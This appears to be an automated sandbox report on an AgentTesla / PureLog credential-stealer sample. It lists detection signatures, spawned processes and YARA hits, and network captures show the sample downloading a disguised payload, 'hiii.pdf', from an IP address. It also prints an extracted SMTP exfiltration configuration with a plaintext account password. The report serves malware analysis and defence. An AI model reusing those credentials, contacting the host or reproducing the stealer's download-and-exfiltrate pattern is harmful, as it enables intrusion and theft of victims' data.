Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe

Overview

General Information

Sample name:SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe
Analysis ID:1361205
MD5:fb2853c7d12653c71eba4c498a42dbee
SHA1:b8cfc97efdde5544922afd7316b4328b6db3c7fd
SHA256:f8ee8795b3fd842a279823aa8925cb2c681457194f6d0bb5e392ab1b24d360fb
Tags:exe
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected AgentTesla
Yara detected PureLog Stealer
.NET source code contains potential unpacker
Contains functionality to log keystrokes (.Net Source)
Downloads files with wrong headers with respect to MIME Content-Type
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • henn.exe (PID: 5788 cmdline: "C:\Users\user\AppData\Roaming\henn.exe" MD5: FB2853C7D12653C71EBA4C498A42DBEE)
    • henn.exe (PID: 3252 cmdline: C:\Users\user\AppData\Roaming\henn.exe MD5: FB2853C7D12653C71EBA4C498A42DBEE)
    • henn.exe (PID: 2724 cmdline: C:\Users\user\AppData\Roaming\henn.exe MD5: FB2853C7D12653C71EBA4C498A42DBEE)
    • henn.exe (PID: 3652 cmdline: C:\Users\user\AppData\Roaming\henn.exe MD5: FB2853C7D12653C71EBA4C498A42DBEE)
    • henn.exe (PID: 3920 cmdline: C:\Users\user\AppData\Roaming\henn.exe MD5: FB2853C7D12653C71EBA4C498A42DBEE)
    • henn.exe (PID: 4336 cmdline: C:\Users\user\AppData\Roaming\henn.exe MD5: FB2853C7D12653C71EBA4C498A42DBEE)
    • henn.exe (PID: 6448 cmdline: C:\Users\user\AppData\Roaming\henn.exe MD5: FB2853C7D12653C71EBA4C498A42DBEE)
    • henn.exe (PID: 4112 cmdline: C:\Users\user\AppData\Roaming\henn.exe MD5: FB2853C7D12653C71EBA4C498A42DBEE)
    • henn.exe (PID: 3676 cmdline: C:\Users\user\AppData\Roaming\henn.exe MD5: FB2853C7D12653C71EBA4C498A42DBEE)
    • henn.exe (PID: 4848 cmdline: C:\Users\user\AppData\Roaming\henn.exe MD5: FB2853C7D12653C71EBA4C498A42DBEE)
    • henn.exe (PID: 6008 cmdline: C:\Users\user\AppData\Roaming\henn.exe MD5: FB2853C7D12653C71EBA4C498A42DBEE)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.asiaparadisehotel.com", "Username": "asia@asiaparadisehotel.com", "Password": "^b2ycDldex$@"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2133922977.0000017C63568000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000000.00000002.2133776369.0000017C61A10000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      0000000C.00000002.2285133162.000001D7BCB6B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000C.00000002.2285133162.000001D7BCB6B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000000.00000002.2134316901.0000017C73434000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 23 entries
            SourceRuleDescriptionAuthorStrings
            0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c61a10000.0.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c734498b8.5.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c734498b8.5.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c734498b8.5.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x31bb6:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x31c28:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x31cb2:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x31d44:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x31dae:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x31e20:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x31eb6:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x31f46:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c734498b8.5.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 8 entries
                    No Sigma rule has matched
                    No Snort rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: http://45.137.22.163Avira URL Cloud: Label: malware
                    Source: http://45.137.22.163/hiii.pdfAvira URL Cloud: Label: malware
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c734498b8.5.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.asiaparadisehotel.com", "Username": "asia@asiaparadisehotel.com", "Password": "^b2ycDldex$@"}
                    Source: http://45.137.22.163Virustotal: Detection: 15%Perma Link
                    Source: C:\Users\user\AppData\Roaming\henn.exeVirustotal: Detection: 23%Perma Link
                    Source: C:\Users\user\AppData\Roaming\henn.exeJoe Sandbox ML: detected
                    Source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeJoe Sandbox ML: detected
                    Source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2133922977.0000017C63332000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134316901.0000017C73301000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134715350.0000017C7BB30000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134316901.0000017C73379000.00000004.00000800.00020000.00000000.sdmp, henn.exe, 0000000C.00000002.2285133162.000001D7BC9A2000.00000004.00000800.00020000.00000000.sdmp, henn.exe, 00000018.00000002.2350909702.000002159309E000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2133922977.0000017C63332000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134316901.0000017C73301000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134715350.0000017C7BB30000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134316901.0000017C73379000.00000004.00000800.00020000.00000000.sdmp, henn.exe, 0000000C.00000002.2285133162.000001D7BC9A2000.00000004.00000800.00020000.00000000.sdmp, henn.exe, 00000018.00000002.2350909702.000002159309E000.00000004.00000800.00020000.00000000.sdmp

                    Networking

                    barindex
                    Source: httpBad PDF prefix: HTTP/1.1 200 OK Content-Type: application/pdf Last-Modified: Wed, 13 Dec 2023 02:14:25 GMT Accept-Ranges: bytes ETag: "ca493a186a2dda1:0" Server: Microsoft-IIS/8.5 Date: Wed, 13 Dec 2023 07:17:03 GMT Content-Length: 664576 Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 80 00 00 00 0c 00 0a 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 20 00 79 00 6c 00 62 00 6d 00 65 00 73 00 73 00 41 00 01 00 08 00 38 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 08 00 34 00 00 00 00 00 00 00 00 00 65 00 6d 00 61 00 4e 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 01 00 22 00 00 00 00 00 6c 00 6c 00 64 00 2e 00 68 00 68 00 6d 00 7a 00 74 00 57 00 00 00 65 00 6d 00 61 00 6e 00 65 00 6c 00 69 00 46 00 6c 00 61 00 6e 00 69 00 67 00 69 0
                    Source: httpBad PDF prefix: HTTP/1.1 200 OK Content-Type: application/pdf Last-Modified: Wed, 13 Dec 2023 02:14:25 GMT Accept-Ranges: bytes ETag: "ca493a186a2dda1:0" Server: Microsoft-IIS/8.5 Date: Wed, 13 Dec 2023 07:17:17 GMT Content-Length: 664576 Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 80 00 00 00 0c 00 0a 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 20 00 79 00 6c 00 62 00 6d 00 65 00 73 00 73 00 41 00 01 00 08 00 38 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 08 00 34 00 00 00 00 00 00 00 00 00 65 00 6d 00 61 00 4e 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 01 00 22 00 00 00 00 00 6c 00 6c 00 64 00 2e 00 68 00 68 00 6d 00 7a 00 74 00 57 00 00 00 65 00 6d 00 61 00 6e 00 65 00 6c 00 69 00 46 00 6c 00 61 00 6e 00 69 00 67 00 69 0
                    Source: httpBad PDF prefix: HTTP/1.1 200 OK Content-Type: application/pdf Last-Modified: Wed, 13 Dec 2023 02:14:25 GMT Accept-Ranges: bytes ETag: "ca493a186a2dda1:0" Server: Microsoft-IIS/8.5 Date: Wed, 13 Dec 2023 07:17:25 GMT Content-Length: 664576 Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 80 00 00 00 0c 00 0a 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 20 00 79 00 6c 00 62 00 6d 00 65 00 73 00 73 00 41 00 01 00 08 00 38 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 08 00 34 00 00 00 00 00 00 00 00 00 65 00 6d 00 61 00 4e 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 01 00 22 00 00 00 00 00 6c 00 6c 00 64 00 2e 00 68 00 68 00 6d 00 7a 00 74 00 57 00 00 00 65 00 6d 00 61 00 6e 00 65 00 6c 00 69 00 46 00 6c 00 61 00 6e 00 69 00 67 00 69 0
                    Source: global trafficHTTP traffic detected: GET /hiii.pdf HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /hiii.pdf HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /hiii.pdf HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 45.137.22.163 45.137.22.163
                    Source: Joe Sandbox ViewIP Address: 45.137.22.163 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: global trafficHTTP traffic detected: GET /hiii.pdf HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /hiii.pdf HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /hiii.pdf HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
                    Source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2133922977.0000017C632F1000.00000004.00000800.00020000.00000000.sdmp, henn.exe, 0000000C.00000002.2285133162.000001D7BC961000.00000004.00000800.00020000.00000000.sdmp, henn.exe, 00000018.00000002.2350909702.0000021593010000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.137.22.163
                    Source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, henn.exe.0.drString found in binary or memory: http://45.137.22.163/hiii.pdf
                    Source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2133922977.0000017C632F1000.00000004.00000800.00020000.00000000.sdmp, henn.exe, 0000000C.00000002.2285133162.000001D7BC961000.00000004.00000800.00020000.00000000.sdmp, henn.exe, 00000018.00000002.2350909702.0000021593010000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2133922977.0000017C63332000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134316901.0000017C73434000.00000004.00000800.00020000.00000000.sdmp, henn.exe, 0000000C.00000002.2285133162.000001D7BCB6B000.00000004.00000800.00020000.00000000.sdmp, henn.exe, 00000018.00000002.2350909702.000002159309E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2133922977.0000017C63332000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134316901.0000017C73434000.00000004.00000800.00020000.00000000.sdmp, henn.exe, 0000000C.00000002.2285133162.000001D7BCB6B000.00000004.00000800.00020000.00000000.sdmp, henn.exe, 00000018.00000002.2350909702.000002159309E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2133922977.0000017C63332000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134316901.0000017C73301000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134715350.0000017C7BB30000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134316901.0000017C73379000.00000004.00000800.00020000.00000000.sdmp, henn.exe, 0000000C.00000002.2285133162.000001D7BC9A2000.00000004.00000800.00020000.00000000.sdmp, henn.exe, 00000018.00000002.2350909702.000002159309E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2133922977.0000017C63332000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134316901.0000017C73301000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134715350.0000017C7BB30000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134316901.0000017C73379000.00000004.00000800.00020000.00000000.sdmp, henn.exe, 0000000C.00000002.2285133162.000001D7BC9A2000.00000004.00000800.00020000.00000000.sdmp, henn.exe, 0000000C.00000002.2286283678.000001D7CCA2F000.00000004.00000800.00020000.00000000.sdmp, henn.exe, 00000018.00000002.2352464998.00000215A30CF000.00000004.00000800.00020000.00000000.sdmp, henn.exe, 